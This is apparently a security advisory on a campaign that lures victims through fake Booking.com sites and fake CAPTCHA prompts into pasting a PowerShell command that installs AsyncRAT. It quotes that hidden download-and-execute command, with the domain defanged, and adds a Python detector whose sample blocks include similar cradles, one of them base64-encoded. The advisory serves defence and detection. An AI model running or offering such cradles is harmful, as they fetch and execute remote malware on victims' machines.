Fake Booking[.]com Sites Deliver AsyncRAT


A recent malware campaign uncovered by Malwarebytes redirects users from gaming platforms and social media to fake Booking.com clones and ultimately infects them with AsyncRAT, a Remote Access Trojan. The redirection links are embedded in ads and in deceptive CAPTCHA forms that exploit user trust to trick victims into running a PowerShell command themselves, which then downloads and installs the malware.

Severity Level: High

Threat Details

1. Attack Vector:

  • Victims are lured through sponsored ads, gaming sites, and social media posts.
  • Redirected to fake Booking[.]com clones.
  • Presented with a CAPTCHA prompt.
  • Clicking the CAPTCHA causes a malicious PowerShell command to be copied to the clipboard.
  • Instructions prompt victims to paste the command into the Windows Run dialog, triggering malware installation.

2. Payload Execution:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet[.]com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The domain is defanged above. Invoke-RestMethod fetches the response body from the attacker's domain and Invoke-Expression runs it as PowerShell in memory, so the first stage never needs to be written to disk; -NoProfile and -WindowStyle Hidden keep the console window out of sight. The fetched script downloads ckjg.exe, which in turn installs Stub.exe.

3. Malware Functionality – AsyncRAT:

  • Remote desktop and keylogging
  • Credential theft
  • File execution and exfiltration
  • Persistence and evasion

Recommendations:

1. Use an active anti-malware solution that blocks malicious websites and scripts.
2. Use a browser extension that blocks malicious domains and scams.
3. Disable JavaScript by default in untrusted contexts to prevent clipboard hijacks via document.execCommand('copy') or the newer navigator.clipboard.writeText() API; a page cannot write to the clipboard without script.
4. Enforce policies via Group Policy to disable or restrict powershell.exe and pwsh.exe for standard users.
5. Educate users on:
  • Recognizing fake CAPTCHA prompts that ask for system-level actions (no legitimate CAPTCHA asks you to open the Run dialog or paste a command).
  • The risks of copying/pasting commands from unknown websites.
  • Red flags in travel booking scenarios (e.g., unusual domains, poor design, unexpected redirects).
6. Use application allowlisting (e.g., Microsoft AppLocker or WDAC) to prevent execution of unauthorized EXEs like Stub.exe.
7. Restrict access to the Windows Run dialog for standard users (Group Policy: "Remove Run menu from Start Menu"). Note that this does not stop a victim from pasting the same command into a PowerShell or Command Prompt window, so combine it with recommendations 4 and 6.
8. Enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and monitor for use of Invoke-RestMethod and Invoke-Expression, their aliases irm and iex, -EncodedCommand, and obfuscated strings.
9. Block the IOCs at their respective controls:
  https://www.virustotal.com/gui/collection/6ffdf218e2d97b362919744b90ab6651a2029969ace685585774616cf452a3ee/iocs
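The classifier below is an added example, not code from the Malwarebytes report or from this advisory. It applies the checks from recommendations 3 and 8 to a single string, whether that string is the ScriptBlockText of a 4104 event exported from a SIEM or the text a suspicious page has just pushed to the clipboard, and it unwraps -EncodedCommand layers before matching, since the plain-text cradle in this advisory is trivially re-packaged that way. The sample blocks are constructed: the first is the advisory's own command with its defanged domain, and example.invalid is a placeholder host, not an indicator from the report.

```python
import base64
import re

# Behaviours recommendation 8 tells analysts to watch for in 4104 script blocks.
# Cmdlet names, aliases and parameter prefixes are case-insensitive in PowerShell.
DOWNLOAD = re.compile(
    r"Invoke-RestMethod|Invoke-WebRequest|\birm\b|\biwr\b|DownloadString|DownloadFile|Net\.WebClient",
    re.I,
)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b|\[scriptblock\]::Create|Start-Process", re.I)
HIDDEN = re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden\b|-NoProfile\b|-nop\b", re.I)
# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc), then the
# base64 blob. -ExecutionPolicy does not match because no whitespace follows its "-e".
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_commands(text: str) -> list:
    """Decode every -EncodedCommand blob in text; blobs that are not valid are skipped."""
    decoded = []
    for blob in ENCODED.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def unwrap(text: str, depth: int = 0) -> list:
    """Return text plus every nested -EncodedCommand payload, decoded (at most 3 layers)."""
    layers = [text]
    if depth < 3:
        for inner in decode_encoded_commands(text):
            layers.extend(unwrap(inner, depth + 1))
    return layers


def analyze(text: str) -> dict:
    """Classify one script block or clipboard payload after unwrapping encoded layers."""
    layers = unwrap(text)
    flat = "\n".join(layers)
    findings = {
        "download": bool(DOWNLOAD.search(flat)),
        "execute": bool(EXECUTE.search(flat)),
        "hidden": bool(HIDDEN.search(flat)),
        "encoded": len(layers) > 1,
        "decoded": layers[1:],
    }
    if findings["download"] and findings["execute"]:
        findings["verdict"] = "cradle"      # fetch-then-run, the pattern in this advisory
    elif findings["encoded"] or (findings["execute"] and findings["hidden"]):
        findings["verdict"] = "suspicious"
    else:
        findings["verdict"] = "benign"
    return findings


# Constructed samples. The first is the advisory's command with its defanged domain;
# example.invalid is a placeholder host, not an indicator from the report.
SAMPLE_BLOCKS = [
    "$banp = 'bkngnet[.]com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv",
    "iex (irm 'http://example.invalid/x.ps1')",
    "powershell -nop -w hidden -enc "
    + encode_command("Invoke-Expression (Invoke-RestMethod -Uri 'http://example.invalid/')"),
    "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Where-Object Length -gt 1MB",
]

if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        result = analyze(block)
        print(f"{result['verdict']:<10} {block[:70]}")
```

Feed it ScriptBlockText values (the third property of a 4104 event) rather than the raw event XML, and treat "cradle" as an alert and "suspicious" as a triage queue; the alias and -EncodedCommand handling is what keeps a one-character rename (irm for Invoke-RestMethod) from slipping past the match recommended above.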

MITRE ATT&CK

Tactic                     Technique                                       ID
Initial Access             Drive-by Compromise                             T1189
Execution                  Command and Scripting Interpreter: PowerShell   T1059.001
Execution                  User Execution: Malicious Link                  T1204.001
Defense Evasion            Obfuscated Files or Information                 T1027
Defense Evasion            Masquerading                                    T1036
Command and Control (C2)   Application Layer Protocol: Web Protocols       T1071.001
Command and Control (C2)   Remote Access Software                          T1219
Credential Access          Input Capture: Keylogging                       T1056.001
Collection                 Clipboard Data                                  T1115

Source:

  • https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites

Ampcus Cyber